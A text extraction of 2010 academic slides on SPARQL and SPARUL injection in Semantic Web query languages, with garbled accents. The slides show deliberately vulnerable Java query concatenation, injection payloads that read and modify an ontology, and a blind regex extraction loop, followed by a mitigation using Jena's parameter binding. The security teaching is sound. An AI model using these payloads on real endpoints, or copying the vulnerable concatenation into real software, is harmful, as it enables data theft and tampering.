TeamStation AI System Report LATAM IT Salaries 2024
Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages
1. Introduction
Vulnerable code samples
Addressing code injection
Conclusions
Addressing Security Issues in the Semantic Web:
Injection attacks in the Semantic Query Languages
Pablo Ordu˜a, Aitor Almeida, Unai Aguilera, Xabier Laiseca,
n
Diego L´pez-de-Ipi˜a, Aitor G´mez-Goiri
o n o
September 9th, 2010
Future Internet - Elkarlaneko ikerkuntza estrategikorako programa;
ETORTEK 2008 img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
2. Introduction
Introduction
Vulnerable code samples
Query Languages
Addressing code injection
Security issues
Conclusions
Introduction
The Semantic Web is based on a set of technologies:
XML
RDF
OWL
...
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
3. Introduction
Introduction
Vulnerable code samples
Query Languages
Addressing code injection
Security issues
Conclusions
Query Languages
New technologies have been developed to query the ontologies
later later
RDQL − − SPARQL − − SPARUL
−→ −→
These new query languages are based on SQL
RDQL and SPARQL → Read-only query languages
introduces
SPARUL (SPARQL/Update) − − − − modification
− − −→
capabilities
SPARQL Sample:
1 PREFIX injection: <http://www.morelab.deusto.es/
injection.owl#>
2 SELECT ?p1
3 WHERE {
4 ?p1 a injection:Person .
5 } img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
4. Introduction
Introduction
Vulnerable code samples
Query Languages
Addressing code injection
Security issues
Conclusions
Security issues
The use of these new query languages introduce vulnerabilities
already found in a bad use of query languages
Attacks like SQL Injection, LDAP Injection or even XPath
Injection are already well known
Libraries provide tools to sanitize user input in these languages
A proper usage of the query languages is required in order to
face new techniques, including:
(Blind) SPARQL Injection
SPARUL Injection
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
5. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARQL Injection
Introducing SPARQL Injection
The following query is assumed to retrieve the friends of a user
whom fullName is provided by the variable name
The ontology is available in
http://www.morelab.deusto.es/injection.owl
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
7. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARQL Injection
Introducing SPARQL Injection
This code can be exploited to retrieve any information in the
ontology
The problem is that the variable name has not been sanitized
This variable can include SPARQL code, and thus modify the
query itself
A variable with malicious content can be found in the next
slide
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
8. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Appending the Strings
1 String queryString =
2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +
3 "SELECT ?name1 ?name2 WHERE {" +
4 " ?p1 a injection:Person . " +
5 " ?p2 a injection:Person . " +
6 " ?p1 injection:fullName ’" + name + "’ . " +
7 " ?p1 injection:isFriendOf ?p2 . " +
8 " ?p1 injection:fullName ?name1 . " +
9 " ?p2 injection:fullName ?name2 . " +
10 "}";
11 String name = "Pablo Orduna’ . " +
12 "?b1 a injection:Building . " +
13 "?b1 injection:name ?name1 . " +
14 "} #";
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
10. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
The final query
1 String queryString =
2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +
3 "SELECT ?name1 ?name2 WHERE {" +
4 " ?p1 a injection:Person . " +
5 " ?p2 a injection:Person . " +
6 " ?p1 injection:fullName ’Pablo Orduna’ . " +
7 " ?b1 a injection:Building . " +
8 " ?b1 injection:name ?name1 . " +
9 " } #" + /* From this point everything
10 is commented and thus ignored */ "’ . " +
11 " ?p1 injection:isFriendOf ?p2 . " +
12 " ?p1 injection:fullName ?name1 . " +
13 " ?p2 injection:fullName ?name2 . " +
14 "}";
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
11. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARQL Injection
This code will return the name of the building instead of the
name of a user
It is possible to use the flexibility of SPARQL to perform other
kind of queries retrieving any information in the ontology
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
12. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Blind SPARQL Injection
Introducing Blind SPARQL Injection
The previous sample was especially vulnerable since it returned
a string
It is possible to retrieve any information as a string
Strings are usually not retrieved in SPARQL, but individuals
What if the returning value is an individual?
It’s still possible to retrieve any information
If it’s possible to know if a given query is true or false, it’s
possible to iteratively retrieve any information
The following code retrieves the individuals themselves
It’s possible to know if the query provided or not the
individuals
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
14. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Blind SPARQL Injection
Once again, the variable name has not been sanitized
So it’s still possible to inject SPARQL code
The injected code can’t return a building or the building name
But, adding a condition like “does the building name start by
this letter” we will get:
The common results → so the building name starts by that
letter
No results → so the building name does not start by that
letter
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
16. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
The final query would be. . .
1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>
" +
2 "PREFIX injection: <http://www.morelab.deusto.es
/injection.owl#> " +
3 "SELECT ?p1 ?p2 WHERE {" +
4 " ?p1 a injection:Person . " +
5 " ?p2 a injection:Person . " +
6 " ?p1 injection:fullName ’Pablo Orduna’ . " +
7 " ?b1 a injection:Building . " +
8 " ?b1 injection:name ?buildingName . " +
9 " FILTER regex(?buildingName, "ˆ" + s + ".*")
. " +
10 " } #" + /* from here ignored*/ "’ˆˆxsd:string .
" +
11 " ?p1 injection:isFriendOf ?p2 . }";
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
17. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Querying recursively. . .
1 public static String recursively(String letters)
throws Exception{
2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++
i){
3 char c = POSSIBLE_LETTERS.charAt(i);
4 if(tryBlind(letters + c)){
5 System.out.println(c);
6 return "" + c + recursively(letters + c);
7 }
8 }
9 return "";
10 }
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
18. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
Blind SPARQL Injection
It is possible to optimize this system using binary search
Performing queries using Regular Expressions like ˆ[A-M].*
to know if the char is between the char A and M
Given a charset of length 64, we would reduce the number of
iterations from 64 times 10 (640) to 6 times 10 (60)
Using the whole UTF-16 charset, it would reduce the number
of iterations from 65536 times 10 (655360) to 16 times 10
(160)
The point is that it’s possible to retrieve any information in
the ontology independently from the values returned by the
query
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
19. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARUL Injection
Introducing SPARQL/Update Injection
All the previous examples are executed in read-only query
languages
SPARUL introduces the chance to modify the ontology
INSERT, MODIFY and DELETE statements are available
The following sample modifies the fullName of the resource
injection:Pablo, setting it to the value of the variable name
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
21. Introduction
SPARQL Injection
Vulnerable code samples
Blind SPARQL Injection
Addressing code injection
SPARUL Injection
Conclusions
SPARUL Injection
1 String name = "Pablo Ordunya’ˆˆxsd:string" +
2 "} n " +
3 "INSERT {" +
4 " injection:Pablo injection:isFriendOf
injection:EvilMonkey" +
5 "} #"; // }:-D
6 String result = sample.run(name);
With this vulnerability, it is possible to modify the whole
ontology.
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
22. Introduction
Vulnerable code samples
Introduction
Addressing code injection
Conclusions
Addressing code injection
Mechanisms provided by the library must be used (if provided)
Not as simple as scaping the ’ characters: the string u0027 is
a simple quote, just as in Java
1 System.out.println("au0022.length() +
u0022b".length());
2 // This code prints "2", the result of
("a".length() + "b".length())
3 // since u0022 will be replaced by "
even if it is commented or inside
4 // String
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
23. Introduction
Vulnerable code samples
Introduction
Addressing code injection
Conclusions
Frameworks
In Jena, the initialBinding argument can be used in the
QueryExecutionFactory
1 // initial binding
2 QuerySolutionMap initialBinding = new
QuerySolutionMap();
3 RDFNode parameterizedName = model.createLiteral(
name);
4 initialSetting.add("thename", parameterizedName);
5
6 // Perform the query
7 Query query = QueryFactory.create(queryString);
8 QueryExecution qe = QueryExecutionFactory.create(
query, model, initialBinding);
9 ResultSet results = qe.execSelect();
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
24. Introduction
Vulnerable code samples
Addressing code injection
Conclusions
Conclusions
Not sanitizing the user input might add a set of security
vulnerabilities in our systems
In the paper it is presented how new query languages inherit
security issues present in older query languages, and therefore
they should also be taken into account when working with
them
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .
25. Introduction
Vulnerable code samples
Addressing code injection
Conclusions
Questions?
DeustoTech - Internet
http://www.morelab.deusto.es
Pablo Ordu˜an pablo.orduna@deusto.es
Aitor Almeida aitor.almeida@deusto.es
Unai Aguilera unai.aguilera@deusto.es
Xabier Laiseca xabier.laiseca@deusto.es
Diego L´pez-de-Ipi˜a
o n dipina@deusto.es
Aitor G´mez-Goiri
o aitor.gomez@deusto.es
img/deustotech.png
P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . .
n o Addressing Security Issues in the Semantic Web: Injection att. . .